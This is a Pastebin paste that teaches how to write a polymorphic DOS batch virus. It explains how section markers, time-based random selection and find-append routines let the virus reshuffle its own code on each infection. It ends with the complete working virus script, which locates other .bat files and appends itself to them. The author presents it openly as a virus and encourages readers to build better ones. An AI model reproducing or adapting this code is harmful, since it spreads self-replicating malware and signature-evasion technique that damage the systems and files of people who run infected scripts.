Advertisement
FlyFar

Tutorials - Glitch's Polymorphic Batch + Code

Jul 9th, 2023
1,355
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 12.80 KB | Cybersecurity | 0 0
  1. ---== Introduction==---
  2.  
  3. Well, first off, you have to think about the way you can make your batch virus polymorphic... Simple? Well, not quite. At the minute, there are two ways, the first I have seen quite a few times and use PKZIP and other compression engines as their "Mutation Engine", then you get mine.. Totally batch scripting.
  4.  
  5. A quick note - If you intend to use my batch scripting method, try and keep your code size down, GPB was 7K at 0-generation and 6Mb at 10-generation!
  6.  
  7. I will only cover my method of polymorphism, because I have not generally played with "Mutation Engines" :)
  8.  
  9. Usually, when we say a virus is polymorphic, we think of the virus being encrypted with a random generator. This is NOT the only way, POLYMORPHIC means "Many Shapes" (as you should know by now!) and the bytes doen't literally have to change to be poly- morphic. In fact, I think viruses which use MtE, DAME, RTFM etc. should be called "Shape-Shifting" viruses, as they only change their bits, not structure.. GPB changed EVERY time, but stayed in its "readable" scripting.
  10.  
  11. ---== Theory ==---
  12.  
  13. Okay, you decided on a polymophic batch using scripting only for compatability. Okay, As far as I'm aware, with present coding it's impossible to ENCRYPT batch scripting, I might work on code for this. So, to make it polymorphic, we're going to have to shift the virus around.
  14.  
  15. To do this, we're going to have to create sections in our code. Now remember, to copy the virus, you need a string that is in EVERY line. This rule can be bent slightly, by turning the string in to section markers..
  16.  
  17. ---== Implementation ==---
  18.  
  19. --= example code =--
  20.  
  21.         @echo off%[GPB_L0.BAT g]%
  22.         if not exist %0.BAT goto GPB_Exit
  23.         %[0.BAT g]%goto GPB_L3
  24.  
  25.         :GPB_L3
  26.         for %%f in (%:GPB_L3%*.bat) do set GPB_File=%%f
  27.         %[:GPB_L3]%goto GPB_L5
  28. In the above code, notice that EVERY line of the first section (Initialisation Routine) has the constant "0.BAT g", this was the marker I used to identify this routine. The second section had the marker ":GPB_L3".
  29. So each and every routine needs an identifier. This is used to write each section in any desired order.
  30.  
  31. --= example code =--
  32.  
  33.         :GPB_L8
  34.         %[:GPB_L8]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  35.         %[:GPB_L8]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  36.         %[:GPB_L8]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  37.         %[:GPB_L8]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  38.         %[:GPB_L8]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  39.         %[:GPB_L8]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  40.         %[:GPB_L8]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  41.         %[:GPB_L8]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  42.         %[:GPB_L8]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  43.         %[:GPB_L8]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  44.         %[:GPB_L8]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  45.         %[:GPB_L8]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  46.         %[:GPB_L8]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  47.         %[:GPB_L8]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  48.         %[:GPB_L8]%goto GPB_Exit
  49. The above code is a one of my infection routines, you need a few for the polymorphism. In this routine, I append all the routines in order they were in the orginal code.
  50. PROBLEM - Because I use markers to identify sections, the markers HAVE to be in the infection routines, ALL of them. So this means when an infection occurs, these routines are appended to the end of each routine!
  51.  
  52. Okay, with this problem, there are 2 problems really -
  53.  
  54. Size increases EVERY infection (if somebody can help me out with this, please EMail me!)
  55. It will try and copy contents to you file.
  56. The work-around for problem 2 is making sure you have a GOTO line at the end of each section like I have done.
  57. PROBLEM - Picking an infection routine
  58.  
  59. This was the first problem I thought about when creating the poly bat but was soon conqured, use the following line -
  60.  
  61.         %[section_marker]% echo. |time >000
  62. This line writes the time to file 000 (change any names you want), also, the section marker can be ALMOST anywhere on the line. eg
  63.         echo. |time >000 %[section_marker]%
  64.         echo. |%[section_marker]% time >000
  65. Next you want to use the FIND command to LOOK for a number. I recommend adding the colons (:) to the number like I did, so there is a better chance of a more random number. Then use code like the following to pick out your random number and go to your desired infection routine -
  66.         %[:GPB_L7]%find "0:" <000>nul
  67.         %[:GPB_L7]%if errorlevel 1 goto GPB_L14
  68. So generally, just patch lots of sections together and create infection routines to copy each section in a certain order. SIMPLE!
  69. ---== Conclusion ==---
  70.  
  71. Well, sorry if this didn't make much sense. I'm not a BATCH Queen! Yes, I did say QUEEN! Anyway, you should have written at least a normal Batch virus before you attempt a poly bat.
  72.  
  73. If you don't understand how it works etc. and want more help, just ask! I seem to be more helpful when directing my attention to somebody who gives me feedback, and I can help them thru the bits they struggle!
  74.  
  75. Well, Good Luck! I hope you can do better than mine! I wish I could get the size problem fixed! Oh well, back to Win32.Amoeba, and B00t (sector infector) ;P
  76.  
  77. Below is GPB's script.... Take care now...
  78.  
  79. ---== GLiTCH's Poly Batch Script ==---
  80.  
  81. @echo off%[GPB_L0.BAT g]%
  82. if not exist %0.BAT goto GPB_Exit
  83. %[0.BAT g]%goto GPB_L3
  84.  
  85. :GPB_L3
  86. for %%f in (%:GPB_L3%*.bat) do set GPB_File=%%f
  87. %[:GPB_L3]%goto GPB_L5
  88.  
  89. :GPB_L5
  90. find /i "GPB"<%GPB_File%>nul %[:GPB_L5]%
  91. %[:GPB_L5]%if errorlevel 1 goto GPB_L7
  92. %[:GPB_L5]%goto GPB_Exit
  93.  
  94. :GPB_L7
  95. %[:GPB_L7]%echo. |time >000
  96. %[:GPB_L7]%find "0:" <000>nul
  97. %[:GPB_L7]%if errorlevel 1 goto GPB_L14
  98. %[:GPB_L7]%find "1:" <000>nul
  99. %[:GPB_L7]%if errorlevel 1 goto GPB_L15
  100. %[:GPB_L7]%find "2:" <000>nul
  101. %[:GPB_L7]%if errorlevel 1 goto GPB_L16
  102. %[:GPB_L7]%find "3:" <000>nul
  103. %[:GPB_L7]%if errorlevel 1 goto GPB_L11
  104. %[:GPB_L7]%find "4:" <000>nul
  105. %[:GPB_L7]%if errorlevel 1 goto GPB_L13
  106. %[:GPB_L7]%find "5:" <000>nul
  107. %[:GPB_L7]%if errorlevel 1 goto GPB_L8
  108. %[:GPB_L7]%find "7:" <000>nul
  109. %[:GPB_L7]%if errorlevel 1 goto GPB_L12
  110. %[:GPB_L7]%find "8:" <000>nul
  111. %[:GPB_L7]%if errorlevel 1 goto GPB_L10
  112. %[:GPB_L7]%find "9:" <000>nul
  113. %[:GPB_L7]%if errorlevel 1 goto GPB_L9
  114. %[:GPB_L7]%goto GPB_L7
  115.  
  116. :GPB_L8
  117. %[:GPB_L8]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  118. %[:GPB_L8]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  119. %[:GPB_L8]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  120. %[:GPB_L8]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  121. %[:GPB_L8]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  122. %[:GPB_L8]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  123. %[:GPB_L8]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  124. %[:GPB_L8]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  125. %[:GPB_L8]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  126. %[:GPB_L8]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  127. %[:GPB_L8]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  128. %[:GPB_L8]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  129. %[:GPB_L8]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  130. %[:GPB_L8]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  131. %[:GPB_L8]%goto GPB_Exit
  132.  
  133. :GPB_L9
  134. %[:GPB_L9]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  135. %[:GPB_L9]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  136. %[:GPB_L9]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  137. %[:GPB_L9]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  138. %[:GPB_L9]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  139. %[:GPB_L9]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  140. %[:GPB_L9]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  141. %[:GPB_L9]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  142. %[:GPB_L9]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  143. %[:GPB_L9]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  144. %[:GPB_L9]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  145. %[:GPB_L9]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  146. %[:GPB_L9]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  147. %[:GPB_L9]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  148. %[:GPB_L9]%goto GPB_Exit
  149.  
  150. :GPB_L10
  151. %[:GPB_L10]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  152. %[:GPB_L10]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  153. %[:GPB_L10]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  154. %[:GPB_L10]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  155. %[:GPB_L10]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  156. %[:GPB_L10]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  157. %[:GPB_L10]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  158. %[:GPB_L10]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  159. %[:GPB_L10]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  160. %[:GPB_L10]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  161. %[:GPB_L10]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  162. %[:GPB_L10]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  163. %[:GPB_L10]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  164. %[:GPB_L10]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  165. %[:GPB_L10]%goto GPB_Exit
  166.  
  167. :GPB_L11
  168. %[:GPB_L11]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  169. %[:GPB_L11]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  170. %[:GPB_L11]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  171. %[:GPB_L11]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  172. %[:GPB_L11]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  173. %[:GPB_L11]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  174. %[:GPB_L11]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  175. %[:GPB_L11]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  176. %[:GPB_L11]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  177. %[:GPB_L11]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  178. %[:GPB_L11]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  179. %[:GPB_L11]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  180. %[:GPB_L11]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  181. %[:GPB_L11]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  182. %[:GPB_L11]%goto GPB_Exit
  183.  
  184. :GPB_L12
  185. %[:GPB_L12]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  186. %[:GPB_L12]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  187. %[:GPB_L12]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  188. %[:GPB_L12]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  189. %[:GPB_L12]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  190. %[:GPB_L12]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  191. %[:GPB_L12]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  192. %[:GPB_L12]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  193. %[:GPB_L12]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  194. %[:GPB_L12]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  195. %[:GPB_L12]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  196. %[:GPB_L12]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  197. %[:GPB_L12]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  198. %[:GPB_L12]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  199. %[:GPB_L12]%goto GPB_Exit
  200.  
  201. :GPB_L13
  202. %[:GPB_L13]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  203. %[:GPB_L13]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  204. %[:GPB_L13]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  205. %[:GPB_L13]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  206. %[:GPB_L13]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  207. %[:GPB_L13]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  208. %[:GPB_L13]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  209. %[:GPB_L13]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  210. %[:GPB_L13]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  211. %[:GPB_L13]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  212. %[:GPB_L13]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  213. %[:GPB_L13]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  214. %[:GPB_L13]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  215. %[:GPB_L13]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  216. %[:GPB_L13]%goto GPB_Exit
  217.  
  218. :GPB_L14
  219. %[:GPB_L14]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  220. %[:GPB_L14]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  221. %[:GPB_L14]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  222. %[:GPB_L14]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  223. %[:GPB_L14]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  224. %[:GPB_L14]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  225. %[:GPB_L14]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  226. %[:GPB_L14]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  227. %[:GPB_L14]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  228. %[:GPB_L14]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  229. %[:GPB_L14]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  230. %[:GPB_L14]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  231. %[:GPB_L14]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  232. %[:GPB_L14]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  233. %[:GPB_L14]%goto GPB_Exit
  234.  
  235. :GPB_L15
  236. %[:GPB_L15]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  237. %[:GPB_L15]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  238. %[:GPB_L15]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  239. %[:GPB_L15]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  240. %[:GPB_L15]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  241. %[:GPB_L15]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  242. %[:GPB_L15]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  243. %[:GPB_L15]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  244. %[:GPB_L15]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  245. %[:GPB_L15]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  246. %[:GPB_L15]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  247. %[:GPB_L15]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  248. %[:GPB_L15]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  249. %[:GPB_L15]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  250. %[:GPB_L15]%goto GPB_Exit
  251.  
  252. :GPB_L16
  253. %[:GPB_L16]%find /i "0.BAT g"<%0.BAT>>%GPB_File%
  254. %[:GPB_L16]%find /i ":GPB_L16"<%0.BAT>>%GPB_File%
  255. %[:GPB_L16]%find /i ":GPB_L7"<%0.BAT>>%GPB_File%
  256. %[:GPB_L16]%find /i ":GPB_L14"<%0.BAT>>%GPB_File%
  257. %[:GPB_L16]%find /i ":GPB_L10"<%0.BAT>>%GPB_File%
  258. %[:GPB_L16]%find /i ":GPB_L8"<%0.BAT>>%GPB_File%
  259. %[:GPB_L16]%find /i ":GPB_L3"<%0.BAT>>%GPB_File%
  260. %[:GPB_L16]%find /i ":GPB_L12"<%0.BAT>>%GPB_File%
  261. %[:GPB_L16]%find /i ":GPB_L15"<%0.BAT>>%GPB_File%
  262. %[:GPB_L16]%find /i ":GPB_L5"<%0.BAT>>%GPB_File%
  263. %[:GPB_L16]%find /i ":GPB_L9"<%0.BAT>>%GPB_File%
  264. %[:GPB_L16]%find /i ":GPB_L13"<%0.BAT>>%GPB_File%
  265. %[:GPB_L16]%find /i ":GPB_L11"<%0.BAT>>%GPB_File%
  266. %[:GPB_L16]%find /i ":GPB_Exit"<%0.BAT>>%GPB_File%
  267. %[:GPB_L16]%goto GPB_Exit
  268.  
  269. :GPB_Exit
  270. %[:GPB_Exit]%del 000
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement